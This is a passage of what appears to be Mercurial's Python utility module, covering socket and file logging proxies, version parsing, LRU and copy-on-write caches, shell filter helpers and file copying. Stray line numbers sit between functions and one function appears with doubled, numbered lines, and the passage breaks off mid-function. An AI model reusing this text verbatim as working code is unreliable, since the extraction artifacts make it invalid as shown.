    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        # Bypass our own __setattr__, which forwards to the wrapped socket.
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        # Intercept only the observed methods; delegate everything else.
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        """Call ``name`` on the wrapped socket, then notify the observer.

        The observer method of the same name (if defined) receives the
        result followed by the original arguments.
        """
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        # This previously forwarded the misspelled name r'recv_info',
        # which real sockets don't have, so recv_into() always raised
        # AttributeError.
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)
810
810
class baseproxyobserver(object):
    """Shared payload-logging helper for the file object/socket observers."""

    def _writedata(self, data):
        # Payload logging disabled: just terminate the API log line, if
        # one was started.
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapedata(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapedata(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        for chunk in data.splitlines(True):
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapedata(chunk)))
        self.fh.flush()
838
838
class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""

    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        self.fh = fh                    # log destination
        self.name = name                # label used in log lines
        self.logdata = logdata          # log payload bytes?
        self.logdataapis = logdataapis  # log one line per API call?
        self.reads = reads              # observe read-side calls?
        self.writes = writes            # observe write-side calls?

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        # res is the byte count read into dest (may be None).
        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)
922
922
def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object.

    ``logh`` receives the log output, ``fh`` is the observed file object
    and ``name`` labels it in the log; the keyword arguments select which
    operations and payloads are recorded.
    """
    return fileobjectproxy(
        fh, fileobjectobserver(logh, name, reads=reads, writes=writes,
                               logdata=logdata, logdataapis=logdataapis))
930
930
class socketobserver(baseproxyobserver):
    """Logs socket activity."""

    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh                    # log destination
        self.name = name                # label used in log lines
        self.reads = reads              # observe receive-side calls?
        self.writes = writes            # observe send-side calls?
        self.states = states            # observe state changes (timeouts &c)?
        self.logdata = logdata          # log payload bytes?
        self.logdataapis = logdataapis  # log one line per API call?

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # socket.send() returns the number of bytes sent as an int;
            # the old code did len(res), which raised TypeError. Also
            # honor logdataapis like every other method here.
            self.fh.write('%s> send(%d, %d) -> %d' % (
                self.name, len(data), flags, res))

        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        # sendto() has two call shapes; flags are only present when an
        # address is also given.
        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        # The old signature was missing ``res`` (every observer callback
        # receives the result first), and the format string had five
        # placeholders but only four arguments, so this always raised
        # TypeError when invoked.
        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))
1047
1047
def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket.

    ``logh`` receives the log output, ``fh`` is the observed socket and
    ``name`` labels it in the log; the keyword arguments select which
    operations, state changes and payloads are recorded.
    """
    return socketproxy(
        fh, socketobserver(logh, name, reads=reads, writes=writes,
                           states=states, logdata=logdata,
                           logdataapis=logdataapis))
1056
1056
def version():
    """Return version information if available."""
    try:
        from . import __version__
    except ImportError:
        # Not running from a built/installed package.
        return 'unknown'
    return __version__.version
1064
1064
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # Split off the first "+..." or "-..." extra tag, if any.  Use a raw
    # string: '[\+-]' relied on the unrecognized escape "\+" surviving,
    # which newer Pythons warn about (and will eventually reject).
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    # Collect leading integer components; stop at the first non-integer.
    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
    # NOTE(review): any other n silently falls through and returns None;
    # callers are expected to pass 2, 3 or 4.
1133
1133
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # nullary function: a one-slot list is enough
        results = []
        def f():
            if not results:
                results.append(func())
            return results[0]
        return f

    results = {}
    if argcount == 1:
        # single-argument variant avoids packing/unpacking a tuple
        def f(arg):
            if arg not in results:
                results[arg] = func(arg)
            return results[arg]
    else:
        def f(*args):
            if args not in results:
                results[args] = func(*args)
            return results[args]

    return f
1159
1159
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        pending = getattr(self, '_copied', 0)
        if not pending:
            # nobody shares this object: safe to mutate in place
            return self
        self._copied = pending - 1
        return self.__class__(self)

    def copy(self):
        """always do a cheap copy"""
        # just count outstanding shares; real copying is deferred to
        # preparewrite()
        self._copied = getattr(self, '_copied', 0) + 1
        return self
1177
1177
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # evict any previous entry first so the key ends up in
        # last-set position
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            items = src.iteritems() if isinstance(src, dict) else src
            for key, value in items:
                self[key] = value
1202
1202
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
    # all behavior comes from the cow and dict base classes; cow must come
    # first in the MRO so preparewrite()/copy() are found before dict's
1228
1228
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """
    # all behavior comes from the cow and sortdict base classes
1234
1234
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, exctb):
        # commit only on a clean exit; release() always runs, which
        # aborts the transaction if close() was never reached
        try:
            if exctype is None:
                self.close()
        finally:
            self.release()
1259
1259
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # close (not abort) even though an exception occurred: the work
        # done so far is kept, and the exception still propagates so the
        # caller can ask the user to intervene
        tr.close()
        raise
    finally:
        # release() aborts the transaction if close() was never reached
        tr.release()
1277
1277
@contextlib.contextmanager
def nullcontextmanager():
    """a no-op context manager, for when a `with` block is required but
    there is nothing to set up or tear down"""
    yield
1281
1281
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        # key is _notset while the node holds no entry and can be recycled
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
1300
1300
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        # backing dict: key -> _lrucachenode
        self._cache = {}

        # the circular list always contains at least one (empty) node
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        # a read counts as an access: promote the node to newest
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        """like dict.get(); NOTE: does not promote the entry to newest"""
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        """empty the cache, keeping the allocated nodes for reuse"""
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        """return a new lrucachedict with the same entries and ordering"""
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
1459
1459
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        # single-argument variant avoids packing/unpacking a tuple
        def f(arg):
            if arg in cache:
                order.remove(arg)
            else:
                if len(cache) > 20:
                    # evict the least recently used entry
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args in cache:
                order.remove(args)
            else:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            order.append(args)
            return cache[args]

    return f
1486
1486
class propertycache(object):
    """non-data descriptor that computes a value once per instance

    The first attribute access runs ``func`` and stores the result in the
    instance ``__dict__`` under the same name, which shadows this
    descriptor on subsequent lookups.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, objtype=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
1499
1499
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    # pop with a default is a no-op when the value was never cached
    obj.__dict__.pop(prop, None)
1504
1504
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    out, _err = proc.communicate(s)
    return out
1511
1511
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, r'wb')
        # close fp even if write() fails, so the descriptor never leaks
        try:
            fp.write(s)
        finally:
            fp.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            # use error.Abort directly instead of the module-local alias
            raise error.Abort(_("command '%s' failed: %s") %
                              (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # best-effort cleanup of both temporary files
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass
1545
1545
# maps a filter-spec prefix to the function implementing that filtering
# strategy; consulted by filter() below
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}
1550
1550
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    for prefix, filterfn in filtertable.iteritems():
        if not cmd.startswith(prefix):
            continue
        # strip the recognized prefix and dispatch to that strategy
        return filterfn(s, cmd[len(prefix):].lstrip())
    # no explicit prefix: treat the whole command as a pipe filter
    return pipefilter(s, cmd)
1557
1557
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def _floorlog2(x):
        # position of the highest set bit; 0 for x == 0
        return x.bit_length() - 1 if x else 0

    pending = []
    size = 0
    for piece in source:
        pending.append(piece)
        size += len(piece)
        if size < min:
            continue
        if min < max:
            # double the threshold, or jump straight to the size we are
            # already seeing if that is bigger, capped at max
            min <<= 1
            nmin = 1 << _floorlog2(size)
            if nmin > min:
                min = nmin
            if min > max:
                min = max
        yield ''.join(pending)
        pending = []
        size = 0
    if pending:
        yield ''.join(pending)
1588
1588
# module-level alias, presumably kept for backwards compatibility; new
# code should use error.Abort directly — TODO confirm remaining users
Abort = error.Abort
1590
1590
def always(fn):
    '''return True regardless of the argument'''
    return True
1593
1593
def never(fn):
    '''return False regardless of the argument'''
    return False
1596
1596
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        # remember whether GC was on so we only re-enable what we disabled
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if wasenabled:
                gc.enable()
    return wrapper
1619
1619
if pycompat.ispypy:
    # PyPy runs slower with gc disabled, so make nogc a no-op there
    nogc = lambda x: x
1623
1623
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # different drives (Windows): no relative path exists, fall
            # back to an absolute path rooted at root
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    # pop the common leading components off both paths
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    # climb out of what remains of n1 ('..' per component), then descend
    # into the remainder of n2; '.' when the two paths were identical
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1649
1649
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze
1659
1659
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

# cached location of the 'hg' executable; filled in lazily by
# hgexecutable() via _sethgexecutable()
_hgexecutable = None
1670
1670
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[r'__main__']
        if hg:
            # explicit override via the HG environment variable
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            # running directly from the 'hg' script
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            # fall back to an 'hg' found on PATH, or whatever we were
            # invoked as
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1694
1694
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    # updates the module-level cache read by hgexecutable()
    global _hgexecutable
    _hgexecutable = path
1699
1699
1700 def _testfileno(f, stdf):
1700 def _testfileno(f, stdf):
1701 fileno = getattr(f, 'fileno', None)
1701 fileno = getattr(f, 'fileno', None)
1702 try:
1702 try:
1703 return fileno and fileno() == stdf.fileno()
1703 return fileno and fileno() == stdf.fileno()
1704 except io.UnsupportedOperation:
1704 except io.UnsupportedOperation:
1705 return False # fileno() raised UnsupportedOperation
1705 return False # fileno() raised UnsupportedOperation
1706
1706
def isstdin(f):
    # True if f is (a wrapper around) the process's original stdin
    return _testfileno(f, sys.__stdin__)
1709
1709
def isstdout(f):
    # True if f is (a wrapper around) the process's original stdout
    return _testfileno(f, sys.__stdout__)
1712
1712
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def tostr(val):
        'convert python object into string that is useful to shell'
        # None/False -> '0' and True -> '1' so shell tests work naturally
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return pycompat.bytestr(val)
    env = dict(encoding.environ)
    if environ:
        for key, val in environ.iteritems():
            env[key] = tostr(val)
    env['HG'] = hgexecutable()
    return env
1727
1727
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is not None and not isstdout(out):
        # caller wants the child's output funneled through out.write()
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    else:
        # child inherits our stdout/stderr directly
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc
1754
1754
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            frames = traceback.extract_tb(sys.exc_info()[2])
            if len(frames) != 1:
                # func's body ran and raised its own TypeError
                raise
            # traceback of depth one: func itself never executed, so the
            # TypeError came from a mismatched call signature
            raise error.SignatureError

    return check
1766
1766
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1782
1782
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember dest's stat so we can detect mtime/ctime ambiguity
            # against the freshly copied file below
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one:
                    # advance mtime by one second (kept within 31 bits)
                    # to disambiguate
                    advanced = (
                        oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))
1835
1835
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible.

    Returns a (hardlink, num) pair: whether hardlinking was (still) in
    effect at the end, and how many files were copied/linked.
    """
    num = 0

